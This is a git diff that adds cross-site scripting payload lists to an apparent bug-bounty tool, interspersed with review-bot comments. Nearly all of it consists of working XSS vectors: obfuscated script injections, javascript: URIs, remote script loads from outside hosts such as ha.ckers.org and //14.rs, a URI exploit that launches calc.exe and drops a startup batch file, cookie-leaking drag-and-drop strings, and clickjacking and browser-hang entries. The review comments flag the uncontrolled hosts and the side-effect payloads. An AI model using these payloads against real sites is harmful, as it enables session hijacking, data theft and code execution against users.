TYPE="text/javascript">alert('XSS');</STYLE> +<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> +<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> +<BASE HREF="javascript:alert('XSS');//"> +<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> +<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT> +getURL("javascript:alert('XSS')") +a="get"; +<!--<value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG SRC="javas<![CDATA[cript:alert('XSS');"> +<XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML> +<HTML><BODY> +<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT> +<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"--> +<? 
echo('<SCR)'; +<META HTTP-EQUIV="Set-Cookie" Content="USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;"> +<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- +<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> \ No newline at end of file diff --git a/bounty_drive/attacks/xss/payloads/XSS-Somdev.txt b/bounty_drive/attacks/xss/payloads/XSS-Somdev.txt new file mode 100644 index 0000000..ca096b4 --- /dev/null +++ b/bounty_drive/attacks/xss/payloads/XSS-Somdev.txt @@ -0,0 +1,22 @@ +<svg%0Aonload=%09((pro\u006dpt))()// +<sCriPt x>(((confirm)))``</scRipt x> +<w="/x="y>"/OndbLcLick=`<`[confir\u006d``]>z +<deTAiLs/open/oNtoGGle=confirm()> +<scRiPt y="><">/*<sCRipt* */prompt()</script +<A href="javascript%26colon;confirm()">click +<sVg oNloaD=write()> +<A href=javas%26#99;ript:alert(1)>click +<sCrIpt/"<a"/srC=data:=".<a,[8].some(confirm)> +<svG/x=">"/oNloaD=confirm()// +<--`<iMG/srC=` onerror=confirm``> --!> +<SVg </onlOad ="1> (_=prompt,_(1)) ""> +<!--><scRipT src=//14.rs> +<sCriPt/src=//14.rs? +<sCRIpt x=">" src=//15.rs></script> +<D3/OnMouSEenTer=[2].find(confirm)>z +<D3"<"/OncLick="1>[confirm``]"<">z +<D3/OnpOinTeReENter=confirm``>click here +<!'/*"/*/'/*/"/*--></Script><Image SrcSet=K */; OnError=confirm`1` //> +<Z oncut=alert()>x +<iFrAMe/src \/\/onload = prompt(1) +<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x> \ No newline at end of file diff --git a/bounty_drive/attacks/xss/payloads/XSS-Vectors-Mario.txt b/bounty_drive/attacks/xss/payloads/XSS-Vectors-Mario.txt new file mode 100644 index 0000000..189082e --- /dev/null +++ b/bounty_drive/attacks/xss/payloads/XSS-Vectors-Mario.txt 
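Review bot: Many entries in XSS-RSNAKE.txt load script, CSS or scriptlet content from `ha.ckers.org`, and XSS-Somdev.txt does the same with `//14.rs` and `//15.rs`; the project controls none of these hosts. If one of these entries is reflected or stored during an authorised test, the tested application pulls whatever those domains currently serve into its own origin. That is outside any programme scope, and the tester cannot audit it. The `securitycompass.com` entries earlier in the diff have the same problem. Replace the fixed hosts with a token the loader substitutes from configuration, for example `{{TESTER_HOST}}` (a constructed placeholder, not an existing setting), and skip these entries when no tester-owned host is configured.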
@@ -0,0 +1,137 @@ +<form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button> +<meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi +<meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&> +0?<script>Worker("#").onmessage=function(_)eval(_.data)</script> :postMessage(importScripts('data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk')) +<script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(5)',384,null,'rsa-dual-use')</script> +<script>({set/**/$($){_/**/setter=$,_=1}}).$=alert</script> +<input onfocus=alert(7) autofocus> +<input onblur=alert(8) autofocus><input autofocus> +<a style="-o-link:'javascript:alert(9)';-o-link-source:current">X</a> +<video poster=javascript:alert(10)//></video> +<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(11)"></g></svg> +<body onscroll=alert(12)><br><br><br><br><br><br>...<br><br><br><br><input autofocus> +<x repeat="template" repeat-start="999999">0<y repeat="template" repeat-start="999999">1</y></x> +<input pattern=^((a+.)a)+$ value=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!> +<script>({0:#0=alert/#0#/#0#(0)})</script> +X<x style=`behavior:url(#default#time2)` onbegin=`alert(16)` > +<?xml-stylesheet href="javascript:alert(17)"?><root/> +<script xmlns="http://www.w3.org/1999/xhtml">&#x61;l&#x65;rt&#40;1)</script> +<meta charset="x-mac-farsi">¼script ¾alert(19)//¼/script ¾ +<script>ReferenceError.prototype.__defineGetter__('name', function(){alert(20)}),x</script> +<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(21)')()</script> +<input onblur=focus() autofocus><input> +<form id=test onforminput=alert(23)><input></form><button form=test onformchange=alert(2)>X</button> +1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=alert(24)&gt;`> +<script 
src="#">{alert(25)}</script>;1 ++ADw-html+AD4APA-body+AD4APA-div+AD4-top secret+ADw-/div+AD4APA-/body+AD4APA-/html+AD4-.toXMLString().match(/.*/m),alert(RegExp.input); +<style>p[foo=bar{}*{-o-link:'javascript:alert(27)'}{}*{-o-link-source:current}*{background:red}]{background:green};</style> +1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=alert(28)&gt;> +<link rel=stylesheet href=data:,*%7bx:expression(alert(29))%7d +<style>@import "data:,*%7bx:expression(alert(30))%7D";</style> +<frameset onload=alert(31)> +<table background="javascript:alert(32)"></table> +<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="alert(33);">XXX</a></a><a href="javascript:alert(2)">XXX</a> +1<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=test.vml#xss></vmlframe> +1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:alert(35) strokecolor=white strokeweight=1000px from=0 to=1000 /></a> +<a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(36)">XXX</a> +<!--<img src="--><img src=x onerror=alert(37)//"> +<comment><img src="</comment><img src=x onerror=alert(38)//"> +<![><img src="]><img src=x onerror=alert(39)//"><svg><![CDATA[><image xlink:href="]]><img src=xx:x onerror=alert(2)//"></svg> +<style><img src="</style><img src=x onerror=alert(40)//"> +<li style=list-style:url() onerror=alert(41)></li><div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(41)></div> +<head><base href="javascript://"/></head><body><a href="/. 
/,alert(42)//#">XXX</a></body> +<?xml version="1.0" standalone="no"?><html xmlns="http://www.w3.org/1999/xhtml"><head><style type="text/css">@font-face {font-family: y; src: url("font.svg#x") format("svg");} body {font: 100px "y";}</style></head><body>Hello</body></html> +<style>*[{}@import'test.css?]{color: green;}</style>X +<div style="font-family:'foo[a];color:red;';">XXX</div> +<div style="font-family:foo}color=red;">XXX</div> +<svg xmlns="http://www.w3.org/2000/svg"><script>alert(47)</script></svg> +<SCRIPT FOR=document EVENT=onreadystatechange>alert(48)</SCRIPT> +<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(49)"></OBJECT> +<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object> +<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></embed> +<x style="behavior:url(test.sct)"> +<xml id="xss" src="test.htc"></xml><label dataformatas="html" datasrc="#xss" datafld="payload"></label> +<script>[{'a':Object.prototype.__defineSetter__('b',function(){alert(arguments[0])}),'b':['secret']}]</script> +<video><source onerror="alert(55)"> +<video onerror="alert(56)"><source></source></video> +<b <script>alert(57)//</script>0</script></b> +<b><script<b></b><alert(58)</script </b></b> +<div id="div1"><input value="``onmouseover=alert(59)"></div><div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script> +<div style="[a]color[b]:[c]red">XXX</div> +<div style="\63&#9\06f&#10\0006c&#12\00006F&#13\R:\000072 Ed;color\0\bla:yellow\0\bla;col\0\00 \&#xA0or:blue;">XXX</div> +<x '="foo"><x foo='><img src=x onerror=alert(62)//'><!-- IE 6-9 --><! '="foo"><x foo='><img src=x onerror=alert(2)//'><? 
'="foo"><x foo='><img src=x onerror=alert(3)//'> +<embed src="javascript:alert(63)"></embed> // O10.10↓, OM10.0↓, GC6↓, FF<img src="javascript:alert(2)"><image src="javascript:alert(2)"> // IE6, O10.10↓, OM10.0↓<script src="javascript:alert(3)"></script> // IE6, O11.01↓, OM10.1↓ +<!DOCTYPE x[<!ENTITY x SYSTEM "http://html5sec.org/test.xxe">]><y>&x;</y> +<svg onload="javascript:alert(65)" xmlns="http://www.w3.org/2000/svg"></svg> +<?xml version="1.0"?><?xml-stylesheet type="text/xsl" href="data:,%3Cxsl:transform version='1.0' xmlns:xsl='http://www.w3.org/1999/XSL/Transform' id='xss'%3E%3Cxsl:output method='html'/%3E%3Cxsl:template match='/'%3E%3Cscript%3Ealert(66)%3C/script%3E%3C/xsl:template%3E%3C/xsl:transform%3E"?><root/> +<!DOCTYPE x [<!ATTLIST img xmlns CDATA "http://www.w3.org/1999/xhtml" src CDATA "xx:x" onerror CDATA "alert(67)" onload CDATA "alert(2)">]><img /> +<doc xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:html="http://www.w3.org/1999/xhtml"><html:style /><x xlink:href="javascript:alert(68)" xlink:type="simple">XXX</x></doc> +<card xmlns="http://www.wapforum.org/2001/wml"><onevent type="ontimer"><go href="javascript:alert(69)"/></onevent><timer value="1"/></card> +<div style=width:1px;filter:glow onfilterchange=alert(70)>x</div> +<// style=x:expression\28alert(71)\29> +<form><button formaction="javascript:alert(72)">X</button> +<event-source src="event.php" onload="alert(73)"> +<a href="javascript:alert(74)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A" /></a> +<script<{alert(75)}/></script </> +<?xml-stylesheet type="text/css"?><!DOCTYPE x SYSTEM "test.dtd"><x>&x;</x> +<?xml-stylesheet type="text/css"?><root style="x:expression(alert(77))"/> +<?xml-stylesheet type="text/xsl" href="#"?><img xmlns="x-schema:test.xdr"/> +<object allowscriptaccess="always" data="test.swf"></object> +<style>*{x:expression(alert(80))}</style> +<x xmlns:xlink="http://www.w3.org/1999/xlink" xlink:actuate="onLoad" 
xlink:href="javascript:alert(81)" xlink:type="simple"/> +<?xml-stylesheet type="text/css" href="data:,*%7bx:expression(write(2));%7d"?> +<x:template xmlns:x="http://www.wapforum.org/2001/wml" x:ontimer="$(x:unesc)j$(y:escape)a$(z:noecs)v$(x)a$(y)s$(z)cript$x:alert(83)"><x:timer value="1"/></x:template> +<x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="javascript:alert(84)//#x"/> +<x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="test.evt#x"/> +<body oninput=alert(86)><input autofocus> +<svg xmlns="http://www.w3.org/2000/svg"><a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="javascript:alert(87)"><rect width="1000" height="1000" fill="white"/></a></svg> +<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><animation xlink:href="javascript:alert(88)"/><animation xlink:href="data:text/xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(88)'%3E%3C/svg%3E"/><image xlink:href="data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(88)'%3E%3C/svg%3E"/><foreignObject xlink:href="javascript:alert(88)"/><foreignObject xlink:href="data:text/xml,%3Cscript xmlns='http://www.w3.org/1999/xhtml'%3Ealert(88)%3C/script%3E"/></svg> +<svg xmlns="http://www.w3.org/2000/svg"><set attributeName="onmouseover" to="alert(89)"/><animate attributeName="onunload" to="alert(89)"/></svg> +<div style=content:url(test2.svg)></div><div style="background:url(test5.svg)">PRESS ENTER</div> +<? foo="><script>alert(91)</script>"><! foo="><script>alert(91)</script>"></ foo="><script>alert(91)</script>"><? foo="><x foo='?><script>alert(91)</script>'>"><! 
foo="[[[x]]"><x foo="]foo><script>alert(91)</script>"><% foo><x foo="%><script>alert(91)</script>"> +<div style="background:url(http://foo.f/f oo/;color:red/*/foo.jpg);">X</div> +<div style="list-style:url(http://foo.f)\20url(javascript:alert(93));">X</div> +<svg xmlns="http://www.w3.org/2000/svg"><handler xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load">alert(94)</handler></svg> +<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><feImage><set attributeName="xlink:href" to="data:image/svg+xml;charset=utf-8;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjxzY3JpcHQ%2BYWxlcnQoMSk8L3NjcmlwdD48L3N2Zz4NCg%3D%3D"/></feImage></svg> +<iframe src=mhtml:http://html5sec.org/test.html!xss.html></iframe><iframe src=mhtml:http://html5sec.org/test.gif!xss.html></iframe> +<div id=d><x xmlns="><iframe onload=alert(97)"></div><script>d.innerHTML+='';</script><div id=d><x xmlns='"><iframe onload=alert(2)//'></div><script>d.innerHTML+='';</script> +<div id=d><div style="font-family:'sans\27\2F\2A\22\2A\2F\3B color\3Ared\3B'">X</div></div><script>with(document.getElementById("d"))innerHTML=innerHTML</script> +XXX<style>*{color:gre/**/en !/**/important}*{color:red}*{background:url(xx:x //**/\red/*)}</style> +<img[a][b]src=x[d]onerror[c]=[e]"alert(100)"> +<a href="[a]java[b]script[c]:alert(101)">XXX</a> +<img src="x` `<script>alert(102)</script>"` `> +<script>history.pushState(0,0,'/i/am/somewhere_else');</script> +<svg xmlns="http://www.w3.org/2000/svg" id="foo"><x xmlns="http://www.w3.org/2001/xml-events" event="load" observer="foo" handler="data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Chandler%20xml%3Aid%3D%22bar%22%20type%3D%22application%2Fecmascript%22%3E alert(104) %3C%2Fhandler%3E%0A%3C%2Fsvg%3E%0A#bar"/></svg> +<iframe 
src="data:image/svg-xml,%1F%8B%08%00%00%00%00%00%02%03%B3)N.%CA%2C(Q%A8%C8%CD%C9%2B%B6U%CA())%B0%D2%D7%2F%2F%2F%D7%2B7%D6%CB%2FJ%D77%B4%B4%B4%D4%AF%C8(%C9%CDQ%B2K%CCI-*%D10%D4%B4%D1%87%E8%B2%03"></iframe> +<img src onerror /" '"= alt=alert(106)//"> +<title onpropertychange=alert(107)></title><title title=></title> +<a href=http://foo.bar/#x=`y></a><img alt="`><img src=xx:x onerror=alert(108)></a>"><!a foo=x=`y><img alt="`><img src=xx:x onerror=alert(2)//"><?a foo=x=`y><img alt="`><img src=xx:x onerror=alert(3)//"> +<svg xmlns="http://www.w3.org/2000/svg"><a id="x"><rect fill="white" width="1000" height="1000"/></a><rect fill="white" style="clip-path:url(test3.svg#a);fill:url(#b);filter:url(#c);marker:url(#d);mask:url(#e);stroke:url(#f);"/></svg> +<svg xmlns="http://www.w3.org/2000/svg"><path d="M0,0" style="marker-start:url(test4.svg#a)"/></svg> +<div style="background:url(/f#[a]oo/;color:red/*/foo.jpg);">X</div> +<div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X</div> +<div id="x">XXX</div><style>#x{font-family:foo[bar;color:green;}#y];color:red;{}</style> +<x style="background:url('x[a];color:red;/*')">XXX</x> +<!--[if]><script>alert(115)</script --><!--[if<img src=x onerror=alert(2)//]> --> +<div id="x">x</div><xml:namespace prefix="t"><import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" targetElement="x" to="&lt;img&#11;src=x:x&#11;onerror&#11;=alert(116)&gt;"> +<a href="http://attacker.org"><iframe src="http://example.org/"></iframe></a> +<div draggable="true" ondragstart="event.dataTransfer.setData('text/plain','malicious code');"><h1>Drop me</h1></div><iframe src="http://www.example.org/dropHere.html"></iframe> +<iframe src="view-source:http://www.example.org/" frameborder="0" style="width:400px;height:180px"></iframe><textarea type="text" cols="50" rows="10"></textarea> +<script>function makePopups(){for 
(i=1;i<6;i++){window.open('popup.html','spam'+i,'width=50,height=50');}}</script><body><a href="#" onclick="makePopups()">Spam</a> +<html xmlns="http://www.w3.org/1999/xhtml"xmlns:svg="http://www.w3.org/2000/svg"><body style="background:gray"><iframe src="http://example.com/" style="width:800px; height:350px; border:none; mask: url(#maskForClickjacking);"/><svg:svg><svg:mask id="maskForClickjacking" maskUnits="objectBoundingBox" maskContentUnits="objectBoundingBox"><svg:rect x="0.0" y="0.0" width="0.373" height="0.3" fill="white"/><svg:circle cx="0.45" cy="0.7" r="0.075" fill="white"/></svg:mask></svg:svg></body></html> +<iframe sandbox="allow-same-origin allow-forms allow-scripts" src="http://example.org/"></iframe> +<span class=foo>Some text</span><a class=bar href="http://www.example.org">www.example.org</a><script src="http://code.jquery.com/jquery-1.4.4.js"></script><script>$("span.foo").click(function(){alert('foo');$("a.bar").click();});$("a.bar").click(function(){alert('bar');location="http://html5sec.org";});</script></div><script src="/\example.com\foo.js"></script><script src="\\example.com\foo.js"></script></div><?xml version="1.0"?><?xml-stylesheet type="text/xml" href="#stylesheet"?><!DOCTYPE doc [<!ATTLIST xsl:stylesheet id ID #REQUIRED>]><svg xmlns="http://www.w3.org/2000/svg"><xsl:stylesheet id="stylesheet" version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"><xsl:template match="/"><iframe xmlns="http://www.w3.org/1999/xhtml" src="javascript:alert(125)"></iframe></xsl:template></xsl:stylesheet><circle fill="red" r="40"></circle></svg> +<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object><object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="alert(126)" style="behavior:url(#x);"><param name=postdomevents /></object> +<svg xmlns="http://www.w3.org/2000/svg" id="x"><listener event="load" handler="#y" xmlns="http://www.w3.org/2001/xml-events" observer="x"/><handler id="y">alert(127)</handler></svg> 
+<svg><style>&lt;img/src=x onerror=alert(128)// </b> +<svg><image style='filter:url("data:image/svg+xml,<svg xmlns=%22http://www.w3.org/2000/svg%22><script>parent.alert(129)</script></svg>")'></svg> +<math href="javascript:alert(130)">CLICKME</math><math><maction actiontype="statusline#http://google.com" xlink:href="javascript:alert(2)">CLICKME</maction><maction actiontype="statusline" xlink:href="javascript:alert(3)">CLICKME<mtext>http://http://google.com</mtext></maction></math> +<b>drag and drop one of the following strings to the drop box:</b><br/><hr/>jAvascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//<br/><hr/>feed:javascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);<br/><hr/>feed:data:text/html,&#x3c;script>alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie)&#x3c;/script>&#x3c;b><br/><hr/>feed:feed:javAscript:javAscript:feed:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);<br/><hr/><div id="dropbox" style="height: 360px;width: 500px;border: 5px solid #000;position: relative;" ondragover="event.preventDefault()">+ Drop Box +</div> +<!doctype html><form><label>type a,b,c,d - watch the network tab/traffic (JS is off, latest NoScript)</label><br><input name="secret" type="password"></form><!-- injection --><svg height="50px"><image xmlns:xlink="http://www.w3.org/1999/xlink"><set attributeName="xlink:href" begin="accessKey(a)" to="//example.com/?a" /><set attributeName="xlink:href" begin="accessKey(b)" to="//example.com/?b" /><set attributeName="xlink:href" begin="accessKey(c)" to="//example.com/?c" /><set attributeName="xlink:href" begin="accessKey(d)" to="//example.com/?d" /></image></svg> +<!-- `<img/src=xx:xx onerror=alert(133)//--!> +<xmp><%</xmp><img alt='%></xmp><img src=xx:x onerror=alert(134)//'><script>x='<%'</script> %>/alert(2)</script>XXX<style>*['<!--']{}</style>-->{}*{color:red}</style> 
+<?xml-stylesheet type="text/xsl" href="#" ?><stylesheet xmlns="http://www.w3.org/TR/WD-xsl"><template match="/"><eval>new ActiveXObject(&apos;htmlfile&apos;).parentWindow.alert(135)</eval><if expr="new ActiveXObject('htmlfile').parentWindow.alert(2)"></if></template></stylesheet> +<form action="" method="post"><input name="username" value="admin" /><input name="password" type="password" value="secret" /><input name="injected" value="injected" dirname="password" /><input type="submit"></form> +<svg><a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="?"><circle r="400"></circle><animate attributeName="xlink:href" begin="0" from="javascript:alert(137)" to="&" /></a> +<link rel="import" href="test.svg" /> +<iframe srcdoc="&lt;img src&equals;x:x onerror&equals;alert&lpar;1&rpar;&gt;" /> \ No newline at end of file diff --git a/bounty_drive/attacks/xss/payloads/XSS-With-Context-Jhaddix.txt b/bounty_drive/attacks/xss/payloads/XSS-With-Context-Jhaddix.txt new file mode 100644 index 0000000..691712a --- /dev/null +++ b/bounty_drive/attacks/xss/payloads/XSS-With-Context-Jhaddix.txt 
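Review bot: XSS-Vectors-Mario.txt mixes alert-style probes with entries whose effect is not a harmless marker, which makes the file unsafe to send wholesale at a live in-scope target. Examples are the `repeat-start="999999"` template entry, the `pattern=^((a+.)a)+$` input with a long value, and the `makePopups()` loop that opens several windows. If any of these is stored, it can degrade the browser of every user who views the page. Several lines also carry trailing browser annotations such as `// IE6, O10.10↓, OM10.0↓`, so a line-per-payload loader (not visible in this diff) would send those comments as part of the payload. Move the entries with side effects to a separate opt-in file and strip the annotations, leaving only benign-marker probes in the default list.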
@@ -0,0 +1,1617 @@ +A very short cross browser header injection +Exploit Name: A very short cross browser header injection +Exploit String: with(document)getElementsByTagName('head')[0].appendChild(createElement('script')).src='//ŋ.ws' +Exploit Description: This vector shows one of the shortest possible ways to inject external JavaScript into a website's header area. +Exploit Tags: xss, short, header, injection +Author Name: .mario + +Add onclick event hadler +Exploit Name: Add onclick event hadler +Exploit String: onclick=eval/**/(/ale/.source%2b/rt/.source%2b/(7)/.source); +Exploit Description: This vector adds an onclick event handler to a tag and appends an obfuscated JS alert. +Exploit Tags: general, JS breaking, basic, obfuscated, user interaction +Author Name: kishor + +Advanced HTML injection locator +Exploit Name: Advanced HTML injection locator +Exploit String: <s>000<s>%3cs%3e111%3c/s%3e%3c%73%3e%32%32%32%3c%2f%73%3e&#60&#115&#62&#51&#51&#51&#60&#47&#115&#62&#x3c&#x73&#x3e&#x34&#x34&#x34&#x3c&#x2f&#x73&#x3e +Exploit Description: This vector indicates HTML injections by stroked text. +Exploit Tags: general, html breaking, injection +Author Name: .mario + +Advanced XSS Locator +Exploit Name: Advanced XSS Locator +Exploit String: ';alert(0)//\';alert(1)//";alert(2)//\";alert(3)//--></SCRIPT>">'><SCRIPT>alert(4)</SCRIPT>=&{}");}alert(6);function xss(){// +Exploit Description: Advanced XSS Locator +Exploit Tags: general, html breaking, comment breaking, JS breaking +Author Name: .mario + +Advanced XSS Locator for title-Injections +Exploit Name: Advanced XSS Locator for title-Injections +Exploit String: ';alert(0)//\';alert(1)//";alert(2)//\";alert(3)//--></SCRIPT>">'></title><SCRIPT>alert(4)</SCRIPT>=&{</title><script>alert(5)</script>}");} +Exploit Description: This is a modified version of the XSS Locator from ha.ckers.org especially crafted to check for title injections. 
+Exploit Tags: general, html breaking, comment breaking, JS breaking, title breaking +Author Name: .mario + +aim: uri exploit +Exploit Name: aim: uri exploit +Exploit String: aim: &c:\windows\system32\calc.exe" ini="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\pwnd.bat" +Exploit Description: This aim-uri executes the calc.exe on vulnerable systems +Exploit Tags: URI exploits, gecko, injection, general +Author Name: xs-sniper + +Backslash-obfuscated XBL injection - variant 1 +Exploit Name: Backslash-obfuscated XBL injection - variant 1 +Exploit String: <div/style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)> +Exploit Description: This vector utilizes backslashes to exploit a parsing error in gecko based browsers and injects a remote XBL. +Exploit Tags: general, injection, gecko, style injection, XBL, obfuscated +Author Name: thespanner.co.uk + +Backslash-obfuscated XBL injection - variant 2 +Exploit Name: Backslash-obfuscated XBL injection - variant 2 +Exploit String: <div/style=&#92&#45&#92&#109&#111&#92&#122&#92&#45& +#98&#92&#105&#92&#110&#100&#92&#105&#110&#92&#103:& +#92&#117&#114&#108&#40&#47&#47&#98&#117&#115&#105& +#110&#101&#115&#115&#92&#105&#92&#110&#102&#111&#46& +#99&#111&#46&#117&#107&#92&#47&#108&#97&#98&#115 +&#92&#47&#120&#98&#108&#92&#47&#120&#98&#108&#92 +&#46&#120&#109&#108&#92&#35&#120&#115&#115&#41&> +Exploit Description: This vector utilizes backslashes to exploit a parsing error in gecko based browsers and injects a remote XBL. All important characters are obfuscated by unclosed entities. 
+Exploit Tags: general, injection, gecko, style injection, XBL, obfuscated +Author Name: thespanner.co.uk + +Backslash-obfuscated XBL injection - variant 3 +Exploit Name: Backslash-obfuscated XBL injection - variant 3 +Exploit String: <Q%^&*(£@!’” style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)> +Exploit Description: This vector utilizes backslashes to exploit a parsing error in gecko based browsers and injects a remote XBL. As we can see gecko based browsers accept various characters as valid tags. +Exploit Tags: general, injection, gecko, style injection, XBL, obfuscated +Author Name: thespanner.co.uk + +Backslash-obfuscated XBL injection - variant 4 +Exploit Name: Backslash-obfuscated XBL injection - variant 4 +Exploit String: <div&nbsp &nbsp style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)> +Exploit Description: This vector utilizes backslashes to exploit a parsing error in gecko based browsers and injects a remote XBL. Furthermore unclosed NBSP entities are used to obfuscate the string. +Exploit Tags: general, injection, gecko, style injection, XBL, obfuscated +Author Name: thespanner.co.uk + +Backslash-obfuscated XBL injection - variant 5 +Exploit Name: Backslash-obfuscated XBL injection - variant 5 +Exploit String: <x/style=-m\0o\0z\0-b\0i\0nd\0i\0n\0g\0:\0u\0r\0l\0(\0/\0/b\0u\0s\0i\0ne\0s\0s\0i\0nf\0o\0.c\0o\0.\0u\0k\0/\0la\0b\0s\0/\0x\0b\0l\0/\0x\0b\0l\0.\0x\0m\0l\0#\0x\0s\0s\0)> +Exploit Description: This vector utilizes backslashes to exploit a parsing error in gecko based browsers and injects a remote XBL. Between any character of the original payload null bytes are used to obfuscate. +Exploit Tags: general, injection, gecko, style injection, XBL, obfuscated +Author Name: thespanner.co.uk + +BASE +Exploit Name: BASE +Exploit String: <BASE HREF="javascript:alert('XSS');//"> +Exploit Description: Works in IE and Netscape 8.1 in safe mode. 
You need the // to comment out the next characters so you won't get a JavaScript error and your XSS tag will render. Also, this relies on the fact that the website uses dynamically placed images like ”images/image.jpg” rather than full paths. If the path includes a leading forward slash like ”/images/image.jpg” you can remove one slash from this vector (as long as there are two to begin the comment this will work +Exploit Tags: general, evil tags +Author Name: ha.ckers.org + +Basic back ticked attribute breaker +Exploit Name: Basic back ticked attribute breaker +Exploit String: `> <script>alert(5)</script> +Exploit Description: This vector breaks back ticked attributes. +Exploit Tags: general, html breaking, basic +Author Name: kishor + +Basic double quoted attribute breaker +Exploit Name: Basic double quoted attribute breaker +Exploit String: > <script>alert(4)</script> +Exploit Description: This vector breaks double quoted attributes and produces an alert. +Exploit Tags: general, html breaking +Author Name: kishor + +Basic JS breaker +Exploit Name: Basic JS breaker +Exploit String: xyz onerror=alert(6); +Exploit Description: This vector just fits between script tags and fires an alerts. +Exploit Tags: general, JS breaking, basic +Author Name: kishor + +Basic JS breaker variant 1 +Exploit Name: Basic JS breaker variant 1 +Exploit String: 1;a=eval;b=alert;a(b(/c/.source)); +Exploit Description: This vector breaks JS integer assignments. +Exploit Tags: general, JS breaking, basic, obfuscated +Author Name: kishor + +Basic JS breaker variant 2 +Exploit Name: Basic JS breaker variant 2 +Exploit String: 1];a=eval;b=alert;a(b(17));// +Exploit Description: This vector breaks JS integer assignments in arrays. 
+Exploit Tags: general, JS breaking, basic, obfuscated
+Author Name: kishor
+
+Basic JS breaker variant 3
+Exploit Name: Basic JS breaker variant 3
+Exploit String: ];a=eval;b=alert;a(b(16));//
+Exploit Description: This vector breaks JS when placed in double quoted arrays.
+Exploit Tags: general, JS breaking
+Author Name: kishor
+
+Basic JS breaker variant 4
+Exploit Name: Basic JS breaker variant 4
